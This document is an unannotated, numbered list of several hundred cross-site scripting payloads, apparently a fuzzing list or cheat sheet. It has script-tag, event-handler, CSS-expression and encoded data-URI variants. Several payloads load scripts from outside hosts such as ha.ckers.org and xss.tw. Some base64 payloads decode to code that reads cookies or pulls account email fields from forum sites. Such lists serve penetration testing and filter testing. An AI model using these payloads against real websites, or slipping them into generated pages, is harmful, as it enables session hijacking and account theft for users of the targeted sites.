<BODY Onload!#$%&()*~+-_.,:;?@[/|]^`=alert(“XSS”)> <SCRIPT/SRC=”http://3w.org/XSS/xss.js"> </ SCRIPT> << SCRIPT> alert (“XSS”) ;/ / << / SCRIPT> <SCRIPT SRC = http://3w.org/XSS/xss.js? <B> <SCRIPT SRC=//3w.org/XSS/xss.js> <IMG SRC = “javascript: alert (‘XSS’)” <iframe src=http://3w.org/XSS.html> <SCRIPT> A = / XSS / alert (a.source) </ SCRIPT> “; alert (‘XSS’) ;/ / </ TITLE> <SCRIPT> alert (“XSS”); </ SCRIPT> <INPUT SRC=”javascript:alert(‘XSS’);”> <BODY BACKGROUND=”javascript:alert(‘XSS’)”><BODY(‘XSS’)> <IMG DYNSRC=”javascript:alert(‘XSS’)”> <IMG LOWSRC=”javascript:alert(‘XSS’)”> <BGSOUND SRC=”javascript:alert(‘XSS’);”> <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”> <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css"> <STYLE> Li {list-style-image: url (“javascript: alert (‘XSS’)”);} </ STYLE> <UL> <LI> XSS <IMG SRC=’vbscript:msgbox(“XSS”)’> </ STYLE> <UL> <LI> XSS %3Cscript%3Ealert(%22XSS%22)%3C/script%3E &lt;script&gt;alert(“XSS”)&lt;/script&gt; &lt;script&gt;alert(“XSS”)&lt;/script&gt; &lt;script&gt;alert(%34XSS%34)&lt;/script&gt; &lt;script&gt;alert(‘XSS’)&lt;/script&gt; callback=javascript://anything%0D%0A%0D%0Awindow.alert(1)// javascript:alert(document.cookie);// ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC=”javascript:alert(‘XSS’);”> <a onmouseover=”alert(document.cookie)”>xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a>
  1423. constructor.constructor(“aler”+”t(3)”)();
  1424. [][?=’constructor’][?](‘ert(‘.padStart(6,’al’).padEnd(8,’1)’))()
  1425. ;[].constructor.prototype.join=function(){return’pwnd’};eval(‘alert(1)’)
  1426. [][?=/constructor/.source][?](/alert(1)/.source)()
  1427. [][?=/constructor/.source][?](/alert(1)/.source)()for(n in{constructor:0})[][?=n][?](/alert(1)/.source)())
  1428. <% contenteditable onresize=alert(1)>
  1429. continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;
  1430. <ControllerColor>C0C0C0</ControllerColor>
  1431. # credit to rsnake
  1432. →cript:alert(‘XSS’)”&gt;</B></I></XML> <SPAN DATASRC=”#xss” DATAFLD=”B”
  1433. <cta id=ANSES actionType=download data=javascript://adobe.com%0aalert(document.domain)><![CDATA[ CLICK HERE ]]></cta>
  1434. {{c=toString.constructor;p=c.prototype;p.toString=p.call;[“a”,”alert(1)”].sort(c)}}
  1435. ctx.call(“fun”)
  1436. ctx.eval(‘1+1’)
  1437. ctx.eval(“var fun = () => ({ foo: 1 });”)
  1438. ctx = py_mini_racer.MiniRacer()
  1439. c.width=500;x.font=’9em”’for(i=3;i — ;x.fillText(T[0]+T[1]+T[2],40,200))t%6<i+2?T[i]=[…’’][(i*t+9*t|0)%5]:S
  1440. c.width=640;
  1441. </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  1442. d=0||’une’+’scape’||0;a=0||’ev’+’al’||0;b=0||’locatio’;b+=0||’n’||0;c=b[a];d=c(d);c(d(c(b)))
  1443. #d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZW
  1444. d=\”alert(‘XSS’);\\”)\”;
  1445. .data
  1446. data&colon;%2f%2f;ba se64;;//,P HNjcmlw dD5hbG VydC gxKTwvc2NyaXB0Pg= =
  1447. DATAFORMATAS=”HTML”></SPAN>
  1448. <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*=”customLog(‘*datahtmlelements* *dataevents*’)”></*datahtmlelements*>
  1449. <*datahtmlelements* *dataevents*=”javascript:parent.customLog(‘*datahtmlelements* *dataevents*’)”></*datahtmlelements*>
  1450. <*datahtmlelements* *datahtmlattributes*=”javascript:parent.customLog(‘*datahtmlelements* *datahtmlattributes*’)”></*datahtmlelements*>
  1451. data:[<MIME-type>][;charset=<encoding>][;base64],<data>
  1452. data:),<script>alert(1)</script>
  1453. data:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))>
  1454. data:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}
  1455. data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
  1456. data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
  1457. data:text/html;base64,PHNjcmlwdD5hbGVydCgiY29va2llOiAiK2RvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=#?someRandomParam1=blah&someRandomParam2=blah
  1458. data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==
  1459. data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
  1460. data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+
  1461. data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe2FsZXJ0KGRvY3VtZW50LmZyYW1lc1swXS5kb2N1bWVudC5jb29raWUpfWZ1bmN0aW9uIGIoKXt2YXIgaT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdpZnJhbWUnKTtpLnN0eWxlPSd3aWR0aDowcHg7aGVpZ2h0OjBweDt2aXNpYmlsaXR5OmhpZGRlbic7aS5zcmMgPSAnaHR0cCc7aS5zcmMrPWRvY3VtZW50LnJlZmVycmVyLmxlbmd0aD8nJzoncyc7aS5zcmMrPSc6Ly9mb3J1bS5hbnRpY2hhdC5ydS9jc3MvYS5jc3MnO2kub25sb2FkPWZ1bmN0aW9uKCl7YSgpfTtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGkpfTwvc2NyaXB0Pjxib2R5IG9ubG9hZD1iKCk+
  1462. data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe2FsZXJ0KGRvY3VtZW50LmZyYW1lc1swXS5kb2N1bWVudC5jb29raWUpfWZ1bmN0aW9uIGIoKXt2YXIgaT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdpZnJhbWUnKTtpLnN0eWxlPSd3aWR0aDowcHg7aGVpZ2h0OjBweDt2aXNpYmlsaXR5OmhpZGRlbic7aS5zcmMgPSAnaHR0cHM6Ly9yZG90Lm9yZy9mb3J1bS9jbGllbnRzY3JpcHQvdmJ1bGxldGluX3JlYWRfbWFya2VyLmpzJztpLm9ubG9hZD1mdW5jdGlvbigpe2EoKX07ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpKX08L3NjcmlwdD48Ym9keSBvbmxvYWQ9YigpPg==
  1463. data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe3ZhciB4PW5ldyBYTUxIdHRwUmVxdWVzdDt4Lm9wZW4oJ0dFVCcsJ2h0dHAnKyhkb2N1bWVudC5yZWZlcnJlci5sZW5ndGggPyAnJyA6ICdzJykrJzovL2ZvcnVtLmFudGljaGF0LnJ1L3Byb2ZpbGUucGhwP2RvPWVkaXRwYXNzd29yZCcsZmFsc2UpO3guc2VuZChudWxsKTthbGVydCh4LnJlc3BvbnNlVGV4dC5tYXRjaCgvbmFtZT0iZW1haWwiIHZhbHVlPSIoLis/KSIvKVsxXSl9PC9zY3JpcHQ+PGJvZHkgb25sb2FkPWEoKT4=
  1464. data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe3ZhciB4PW5ldyBYTUxIdHRwUmVxdWVzdDt4Lm9wZW4oJ0dFVCcsJ2h0dHBzOi8vcmRvdC5vcmcvZm9ydW0vcHJvZmlsZS5waHA/ZG89ZWRpdHBhc3N3b3JkJyxmYWxzZSk7eC5zZW5kKG51bGwpO2FsZXJ0KHgucmVzcG9uc2VUZXh0Lm1hdGNoKC9uYW1lPSJlbWFpbCIgdmFsdWU9IiguKz8pIi8pWzFdKX08L3NjcmlwdD48Ym9keSBvbmxvYWQ9YSgpPg==
  1465. data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZWxzZXthbGVydChkb2N1bWVudC5kb21haW4pfTwvc2NyaXB0Pg==
  1466. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
  1467. data:text/html;charset=utf-8,<h1>abc
  1468. data:text/html,<iframe src=javascript:alert(1)>
  1469. data:text/html,<img src=1 onerror=alert(1)>
  1470. #data:text/html,<img src=1 onerror=alert(document.domain)
  1471. data:text/html,/*<img src=x ‘-alert(1)-’ onerror=alert(1)>*/alert(1)
  1472. data:text/html,/*<img src=x ‘-confirm(1)-’ onerror=confirm(1)>*/confirm(1)
  1473. data:text/html,<script>alert(0)</script>
  1474. data:text/html,< sc r i p t >alert(1)</sc r ip t>
  1475. data:text/html,<script>alert(1)</script>//
  1476. data:text/html,<script>alert(1)</script>
  1477. data:text/html,<script>confirm(0);confirm(1);location.reload();</script>
  1478. data:text/html,<svg onload=alert(1)>
  1479. data:text/html,<svg onload=alert(/@irsdl/)></svg>
  1480. data://text/javascript,alert(‘xss’)
  1481. Data URl
  1482. d.body.appendChild(z)
  1483. d.body.appendChild(z)},0)>
  1484. d=document;
  1485. _.defer(alert, 9)
  1486. .__defineGetter__.constructor(‘[].constructor.
  1487. defineSetter(‘x’,confirm); x=1;
  1488. _.delay(alert, 0, 9)
  1489. delete~[a=confirm]/delete a(1)
  1490. delete [a=confirm],delete a(1)
  1491. delete confirm(1)
  1492. delete [][‘__proto__’][‘toString’];[][‘__proto__’][Symbol.toStringTag]=’=alert(1)’;eval([1,2,3]+’’);
  1493. delFeedback(‘&apos;)alert(1)’
  1494. <details onfocus = “alert(1)”>
  1495. <details ontoggle=alert(1)>
  1496. <details ontoggle=”aler\u0074(1)”>
  1497. “><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
  1498. <details open ontoggle=”alert(1)”>
  1499. <details open ontoggle=alert(1)>
  1500. <details/open/ontoggle=”alert`1`”>
  1501. ><detials ontoggle=confirm(0)>
  1502. ��><detials ontoggle=confirm(0)>
  1503. <dialog open=”” onclose=”alert(1)”><form
  1504. <dialog open=”” onclose=”alert(1)”><form method=”dialog”><button>Close me!</button></form></dialog>
  1505. display:block;color:transparent;
  1506. <div>
  1507. <div%20id=a%20style=float:left%20onfocus=alert(1)>#a
  1508. <div%20id=”a”%20style=-ms-block-progression:bt%20onfocus=alert(1)>#a
  1509. <div%20id=a%20style=-ms-layout-flow:vertical-ideographic%20onfocus=alert(1)>#a
  1510. <div%20style=-webkit-user-modify:read-write%20onfocus=alert(1)%20id=x>#x
  1511. <%div%20style=xss:expression(prompt(1))>
  1512. <DIV><A></A>
  1513. <div> <a href=/**/alert(15)>XSS</a><base href=”javascript:\ </div><div id=”x”></div>
  1514. <div> <a href=/**/alert(1)>XSS</a><base href=”javascript:\ </div><div id=”x”></div>
  1515. <div>`-alert(1)</script><script>`</div>
  1516. <div>`-alert(4)</script><script>`</div>
  1517. <div><base href=//cors.l0.cm/</div><script src=/test.js></script>
  1518. <div><base href=//evil/</div>
  1519. <div><base href=//evil/ </div>
  1520. <div><base href=”javascript:/”><a href=/**/alert(1)>XSS</a></div>
  1521. <div><base href=”javascript:\”><a href=/**/alert(1)>XSS</a></div>
  1522. <div><base/href=javascript:/><a href=/*’”+-/%~.,()^&$#@!*/alert(1)>XSS</a></div>
  1523. <div class=”qm_left” style=”position:relative;z-index:2;background:url(//xss.tw/2180) no-repeat 0 0;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src=’//xss.tw/2180',sizingMethod=’scale’);width:40px;height:40px;”>
  1524. <div contenteditable onresize=”alert(1)”></div>
  1525. <div contextmenu=x>right-click<menu id=x onshow=confirm(1)>
  1526. <div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”alert(1)”>
  1527. <div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”[DATA]”>
  1528. div data-bind=”foo: “ /div
  1529. div data-bind=”html:’hello bworld /b’” /div
  1530. div data-bind=”html:’ script src=”//evil.com” /script’” /div
  1531. div data-bind=”value:’hello world’”?/div
  1532. div data-dojo-type=”dijit/Declaration”data-dojo-props=”} — {“
  1533. <div datafld=”b” dataformatas=”html” dataid=XSS SRC=”#XSS”></div>
  1534. <div datafld=”b” dataformatas=”html” datasrc=”#X”></div>
  1535. div data-role=”button”data-text=”I am a button” /div
  1536. div data-role=”button”data-text=” script /script” /div
  1537. div data-role=popup id=’ — script /script’?/div
  1538. div data-toggle=tooltip data-html=true title=’script /script’ /div
  1539. div data-toggle=tooltip title=’I am atooltip!’some text /div
  1540. </div><div id=”x”>AAA</div>
  1541. <div draggable=”true” ondragstart=”event.dataTransfer.setData(‘text/plain’, ‘Evil data’)><h3>DRAG ME!!</h3></div>
  1542. <div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>
  1543. <div><embed allowscriptaccess=always src=/xss.swf><base href=”//l0.cm/</div><div id=”x”>AAA</div>
  1544. <div> <embed allowscriptaccess=always src=/xss.swf><base href=”//l0.cm/ </div><div id=”x”></div>
  1545. <div id=”alert(/@0x6D6172696F/)” style=”x:expression(eval)(id)”>
  1546. <div id=”confirm(2)” style=”x:expression(eval)(id)”>
  1547. <div id=d><div style=”font-family:’sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B’”>X</div></div>
  1548. <div id=d><div style=”font-family:’sans\27\3B color\3Ared\3B’”>X</div></div>
  1549. <div id=d><div style=”font-family:’sans\27\3B color\3Ared\3B’”>X</div></div> <script>with(document.getElementById(“d”))innerHTML=innerHTML</script>
  1550. <div id=”div1"><input value=”``onmouseover=alert(1)”></div> <div id=”div2"></div><script>document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;</script>
  1551. <div id=”div1"><input value=”``onmouseover=javascript:alert(1)”></div> <div id=”div2"></div>
  1552. <div id=”div1"><input value=”``onmouseover=javascript:alert(1)”></div> <div id=”div2"></div><script>document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;</script>
  1553. <div id=d><x xmlns=”><body onload=alert(1)”><script>d.innerHTML=����</script>
  1554. <div id=d><x xmlns=”><iframe onload=alert(1)”></div>
  1555. <div id=d><x xmlns=’”><iframe onload=alert(2)//’></div>
  1556. <div id=d><x xmlns=”><iframe onload=javascript:alert(1)”></div> <script>d.innerHTML=d.innerHTML</script>
  1557. <div id=”myxsxxcd” style=”color:red;display:none” title=”if(!window.myxsssxx){window.myxsssxx=123;alert(document.cookie);}”>
  1558. <div id = “x”></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
  1559. <div id=”xss” onwebkittransitionend=”alert(1)” style=”-webkit-transition: width .1s;”></div>
  1560. <DIV id=XSS STYLE=”background-image: url(javascript:alert(‘XSS’))”>
  1561. <DIV id=XSS STYLE=”binding: url(javascript:alert(‘XSS’));”>
  1562. <div id=”xss” style=”float:left” onfocus=”alert(1)”>
  1563. <div id=”xss” style=”-ms-block-progression:bt” onfocus=”alert(1)”>
  1564. <div id=”xss” style=”-ms-layout-flow:vertical-ideographic” onfocus=”alert(1)”>
  1565. <DIV id=XSS STYLE=”width: expression(alert(‘XSS’));”>
  1566. <div id=”x”>x</div> <xml:namespace prefix=”t”> <import namespace=”t” implementation=”#default#time2"> <t:set attributeName=”innerHTML” targetElement=”x” to=”&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;”>
  1567. <div id=”x”>x</div> <xml:namespace prefix=”t”> <import namespace=”t” implementation=”#default#time2"> <t:set attributeName=”innerHTML” targetElement=”x” to=”&lt;img src=x:x onerror =javascript:alert(1)&gt;”>
  1568. <div id=”x”>XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
  1569. <div id=”x”>XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
  1570. <div>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
  1571. ‘“>><div><meter onmouseover=”alert(1)”</div>”
  1572. <div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
  1573. div ng-app ng-cspng-focus=”x=$event.view.window;x.”
  1574. <div onactivate=”alert(1)” id=”xss” style=”overflow:scroll”></div>
  1575. <div onactivate=alert(‘Xss’) id=xss style=overflow:scroll>
  1576. <div onbeforescriptexecute=”alert(1)”></div>
  1577. <div onclick=”alert(‘xss’)”>
  1578. <div onfocus=”alert(1)” contenteditable tabindex=”0" id=”xss”></div>
  1579. <div onfocus=”alert(1)” id=”xss” style=”display:table”>
  1580. <div onfocus=alert(‘xx’) id=xss style=display:table>
  1581. <div onmouseenter=”alert(‘xss’)”>
  1582. <div onmousemove=”alert(200)” src=”xxxx”>
  1583. <div/onmouseover=’alert(1)’>renwa
  1584. <div/onmouseover=’alert(1)’> style=”x:”>
  1585. <div/onmouseover=’alert(1)’> style=”x:”>
  1586. <div/onmouseover=’alert(1)’>X
  1587. <div onmouseover=’alert&lpar;1&rpar;’>DIV</div>
  1588. <div onmouseover=”alert(‘XSS’);”>,
  1589. <div/onmouseover=’confirm(1)’> style=”x:”>
  1590. <div onmouseover=’confirm&lpar;1&rpar;’>DIV</div>
  1591. <div onmouseover=”document.vulnerable=true;”>
  1592. <div onmouseover=prompt(“1”)>renwa
  1593. div ref=mes.bind=”$this.me.ownerdefaultView.” /div
  1594. <div><script>alert(1)
  1595. →</div><script src=/test.js></script>
  1596. <div>”src=data:,alert%281%29></script><script x=”</div>
  1597. <div>”src=data:,alert%2824%29></script><script x=”</div>
  1598. <div style=”&#119;&#105;&#100;&#116;&#104;&#58;&#101;&#120;&#112;&#114;&#101;&#115;&#115;&#105;&#111;&#110;&#40;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#49;&#39;&#41;&#41;”>1</div>
  1599. <div style=”&#119;&#105;&#100;&#116;&#104;&#58;&#92;&#48;&#48;&#54;&#53;&#120;&#112;&#114;&#101;&#115;&#115;&#105;&#111;&#110;&#40;&#97;&#108;&#101;&#114;&#116;&#40;&#47;&#49;&#47;&#41;&#41;”>1</div>
  1600. <div style=”\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;”>XXX</div><div style=”[a]color[b]:[c]red”>XXX</div>
  1601. <div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>
  1602. <div style=”animation-name:x” onanimationstart=”alert(1)”></div>
  1603. <DIV STYLE=”background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.
  1604. <;DIV STYLE=”;background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;
  1605. <DIV STYLE=”background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  1606. <DIV STYLE=”background-image: 075 072 06C 028 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029 029">
  1607. <;DIV STYLE=”;background-image: url(&;#1;javascript:alert(‘;XSS’;))”;>;
  1608. <DIV ?STYLE=”background-image: ?url(&#1;javascript:alert(‘XS ?S’))”>
  1609. <DIV STYLE=”background-image: url(&#1;javascript:alert(‘XSS’))”>
  1610. <DIV STYLE=”background-image: url(&#1;javascript:confirm(5))”>
  1611. <div STYLE=”background-image: url(&#1;javascript:document.vulnerable=true;)”>
  1612. <div style=”background-image:url(javascript:alert(‘1’))”>
  1613. <DIV+STYLE=”background-image: url(javascript:alert(1))”>
  1614. <div style=”background-image:url(javascript:alert(document.cookie))”>
  1615. <DIV STYLE=”background-image: url(javascript:alert(‘X1SS’))”>
  1616. <;DIV STYLE=”;background-image: url(javascript:alert(‘;XSS’;))”;>;
  1617. <DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
  1618. <DIV STYLE=”background-image: url(javascript:alert(‘XSS’));”>
  1619. <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
  1620. <DIV STYLE=”background-image: url(javascript:alert(XSS))”>
  1621. <DIV STYLE=”background-image: url(javascript:confirm(5))”>
  1622. <div style=”background-image: url(javascript:document.vulnerable=true;);”>
  1623. <div STYLE=”background-image: url(javascript:document.vulnerable=true;)”>
  1624. <DIV STYLE=”background-image: url(javascript:javascript:alert(1))”>
  1625. <div style=”background-image:url(<script>alert(document.cookie)</script>)”>
  1626. <div style=”background:url(/f#&#127;oo/;color:red/*/foo.jpg);”>X
  1627. <div style=”background:url(/f#[a]oo/;color:red/*/foo.jpg);”>X</div>
  1628. <div style=”background:url(/f#oo/;color:red/*/foo.jpg);”>X
  1629. <div style=”background:url(/foo/;color:red/*/foo.jpg);”>X
  1630. <div style=”background:url(http://foo.f/f oo/;color:red/*/foo.jpg);”>X</div>
  1631. <div style=behavior:url(“ onclick=alert(1)//”>XSS’OR
  1632. <div style=”behaviour:url(‘http://www.how-to-hack.org/exploit.html');">
  1633. <DIV STYLE=”behaviour: url(‘http://www.how-to-hack.org/exploit.html');">
  1634. <DIV STYLE=”behaviour: url(‘http://xss.ha.ckers.org/exploit.htc');">
  1635. <div style=”behaviour: url([link to code]);”>
  1636. <div style=”binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
  1637. <div style=”binding: url([link to code]);”>
  1638. <div style=”color: ‘<’; color: expression(alert(‘XSS’))”>
  1639. <div style=”color: expression(alert(‘XSS’))”>
  1640. <div style=”color:rgb(&#039;&#039;x:expression(alert(1))”></div>
  1641. <div style=”color:rgb(‘’&#0;x:expression(alert(1))”></div>
  1642. <Div style = “color: rgb (‘’ & # 0; x: expression (alert (1))”> </ div>
  1643. <div style=”color:rgb(‘’&#0;x:expression(alert(URL=1))”></div>
  1644. <div style=”color:rgb(‘’&#0;x:expression(confirm(URL=1))”></div>
  1645. <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
  1646. <div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Mouse Over</div>
  1647. <div style=content:url(%(svg)s)></div>
  1648. <div style=”display:none”></div><div style=”display:none” t=”1" e=”style\/&lt;&#39;&quot;&gt;&lt;/div&gt;&quot;/ \&quot;&quot;/&lt;img src=# onerror=eval(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,120,115,115,46,116,119,47,51,48,53,56,62,60,47,115,99,114,105,112,116,62,32));/\&gt>
  1649. <div style=”display:none” style=”behavior:url(‘?1’)”
  1650. <div style=”display:none” style=”behavior:url(‘?1’)” onreadystatechange=”alert(1)”>1</div>
  1651. <div style=”font-family:’foo&#10;;color:red;’;”>LOL
  1652. <div style=”font-family:’foo&#10;;color:red;’;”>XXX
  1653. <div style=”font-family:’foo[a];color:red;’;”>XXX</div>
  1654. <div style=”font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
  1655. <div style=”font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
  1656. <div style=”font-family:’foo ;color:red;’;”>XXX
  1657. <div style=”font-family:foo}color=red;”>XXX
  1658. <div style=”font-family:foo}color=red;”>XXX</div>
  1659. <div style = “list-style-image:url(javascript:alert(xSS))”>
  1660. <div style=”list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
  1661. <div style=”list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
  1662. <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
  1663. <div style=”-moz-binding:url(http://xssor.io/0.xml#xss);x:expression((window.r!=1)?eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,119,119,119,46,48,120,51,55,46,99,111,109,47,48,46,106,115));document.getElementById(x(105,110,106,101,99,116)).appendChild(scr);window.r=1;'):1);"id="inject">
  1664. <div style=”-ms-scrolllimit:1px;overflow:scroll;width:1px”
  1665. <div style=”-ms-scroll-limit:1px;overflow:scroll;width:1px” onscroll=”alert(1)”>
  1666. <div style=”-ms-scroll- limit:1px;overflow:scroll;width:1px” onscroll=alert(‘xss’)>
  1667. <div style=”-ms-scroll-limit:1px;overflow:scroll;width:1px” onscroll=alert(‘xss’)>
  1668. <DIV STYLE_NeatHtmlReplace=”background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  1669. <DIV STYLE_NeatHtmlReplace=”background-image: url(&#1;javascript:alert(‘XSS’))”>
  1670. <DIV STYLE_NeatHtmlReplace=”background-image: url(javascript:alert(‘XSS’))”>
  1671. <DIV STYLE_NeatHtmlReplace=”width: expression(alert(‘XSS’));”>
  1672. <div style=overflow:-webkit-marquee onscroll=alert(1)>
  1673. <div style=”overflow:-webkit-marquee” onscroll=”alert(1)”></div>
  1674. <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onclick=”alert(52)”>
  1675. <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>?
  1676. <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>
  1677. <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>?
  1678. <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>
  1679. <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button><div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”confirm(1)”>x</button>
  1680. <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”confirm(1)”>x</button>?f
  1681. <div style=”visibility:hidden” style=”behavior:url(‘?2’)”
  1682. <div style=”visibility:hidden” style=”behavior:url(‘?2’)” onreadystatechange=”alert(2)”>2</div>
  1683. <div style=”-webkit-user-modify:read-write” onfocus=”alert(1)” id=”xss”>
  1684. <div style=”-webkit-user-modify:read-write-plaintext-only” onfocus=”alert(1)” id=”xss”>
  1685. <div style=”width:\0065xpressio\6e(alert(/1/))”>1</div>
  1686. <div style=”width:\0065xpression(alert(/1/))”>1</div>
  1687. <div style=width:1px;filter:glow onfilterchange=alert(1)>x
  1688. <div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
  1689. <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
  1690. <div style=”width:exp/**
  1691. <div style=”width:expression(alert(‘1’));”>
  1692. <div style=”width:exp/****/ression(alert(/1/))”>1</div>
  1693. <div style=”width:expression(alert(/1/))”>1</div>
  1694. <div style=”width:expression(alert(‘1’))”>1</div>
  1695. <DIV STYLE=”width:expression(alert(‘anyunix’));”>
  1696. <div style=”width:expression(alert(‘x123ss’));”>
  1697. <DIV STYLE=”width: expression(alert(‘X2SS’));”>
  1698. <;DIV STYLE=”;width: expression(alert(‘;XSS’;));”;>;
  1699. <DIV STYLE=”width: ?expression(alert(‘XSS’));”>
  1700. <DIV STYLE=”width: expression(alert(‘XSS’));”>
  1701. <DIV STYLE=”width: expression(alert(XSS));”>
  1702. <div style=”width:expression(confirm(1))”>X</div>
  1703. <div/style=”width:expression(confirm(1))”>X</div>
  1704. <div/style=”width:expression(confirm(1))”>X</div> {IE7}
  1705. <DIV STYLE=”width: expression(confirm(5));”>
  1706. <div style=”width: expression(document.vulnerable=true;);”>
  1707. <div STYLE=”width: expression(document.vulnerable=true);”>
  1708. <DIV STYLE=”width:expression(javascript:alert(1));”>
